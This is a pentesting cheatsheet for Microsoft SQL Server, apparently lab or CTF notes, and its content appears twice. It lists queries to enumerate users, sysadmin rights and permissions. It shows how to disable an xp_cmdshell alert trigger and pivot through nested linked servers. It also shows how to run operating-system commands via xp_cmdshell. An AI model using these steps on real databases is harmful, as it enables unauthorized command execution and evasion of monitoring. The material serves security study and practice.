MSSQL

via mssqlclient cheatsheet


# to get version
select @@version;

# to get current server
select @@servername

#current user
select suser_name();

#To List Users
SELECT name FROM master..syslogins

#To List sysadmin privs for all users
SELECT name,sysadmin FROM master..syslogins
SELECT name FROM master..syslogins WHERE sysadmin = '1';

#List database
SELECT name FROM master..sysdatabases;

#to check or permission
SELECT entity_name, permission_name FROM fn_my_permissions(NULL, 'SERVER');

#List table and schema
select table_name,table_schema from flag.INFORMATION_SCHEMA.TABLES;

#To query a different DB in MSSQL, it’s [server].[db].[schema].[table]

#to list triggers and disable trigger
select name from sys.server_triggers;
disable trigger ALERT_xp_cmdshell on all server

Database Link

#List the database links
select * from master..sysservers

#List server name
select * from openquery("COMPATIBILITY\POO_CONFIG", 'select @@servername');

#List Version
select * from openquery("COMPATIBILITY\POO_CONFIG", 'select @@version');

#List sysadmin
select * from openquery("COMPATIBILITY\POO_CONFIG", 'SELECT name,sysadmin FROM master..syslogins');

nested database links

#try to have POO_CONFIG run a command on POO_PUBLIC
select * from openquery("COMPATIBILITY\POO_CONFIG",'select * from openquery("COMPATIBILITY\POO_PUBLIC",''select suser_name();'')')

#To check for permission
select * from openquery("COMPATIBILITY\POO_CONFIG",'select * from openquery("COMPATIBILITY\POO_PUBLIC",''SELECT entity_name, permission_name FROM fn_my_permissions(NULL, ''''SERVER'''');'')')

#xp_cmdshell via EXECUTE
EXECUTE('EXECUTE(''xp_cmdshell whoami'') AT [COMPATIBILITY\POO_PUBLIC]') AT [COMPATIBILITY\POO_CONFIG]

PreviousCypher Injection NextBackDrop CMS

Last updated 29 days ago

MSSQL

via mssqlclient cheatsheet


# to get version
select @@version;

# to get current server
select @@servername

#current user
select suser_name();

#To List Users
SELECT name FROM master..syslogins

#To List sysadmin privs for all users
SELECT name,sysadmin FROM master..syslogins
SELECT name FROM master..syslogins WHERE sysadmin = '1';

#List database
SELECT name FROM master..sysdatabases;

#to check or permission
SELECT entity_name, permission_name FROM fn_my_permissions(NULL, 'SERVER');

#List table and schema
select table_name,table_schema from flag.INFORMATION_SCHEMA.TABLES;

#To query a different DB in MSSQL, it’s [server].[db].[schema].[table]

#to list triggers and disable trigger
select name from sys.server_triggers;
disable trigger ALERT_xp_cmdshell on all server

Database Link

#List the database links
select * from master..sysservers

#List server name
select * from openquery("COMPATIBILITY\POO_CONFIG", 'select @@servername');

#List Version
select * from openquery("COMPATIBILITY\POO_CONFIG", 'select @@version');

#List sysadmin
select * from openquery("COMPATIBILITY\POO_CONFIG", 'SELECT name,sysadmin FROM master..syslogins');

nested database links

#try to have POO_CONFIG run a command on POO_PUBLIC
select * from openquery("COMPATIBILITY\POO_CONFIG",'select * from openquery("COMPATIBILITY\POO_PUBLIC",''select suser_name();'')')

#To check for permission
select * from openquery("COMPATIBILITY\POO_CONFIG",'select * from openquery("COMPATIBILITY\POO_PUBLIC",''SELECT entity_name, permission_name FROM fn_my_permissions(NULL, ''''SERVER'''');'')')

#xp_cmdshell via EXECUTE
EXECUTE('EXECUTE(''xp_cmdshell whoami'') AT [COMPATIBILITY\POO_PUBLIC]') AT [COMPATIBILITY\POO_CONFIG]

PreviousCypher Injection NextBackDrop CMS

Last updated 29 days ago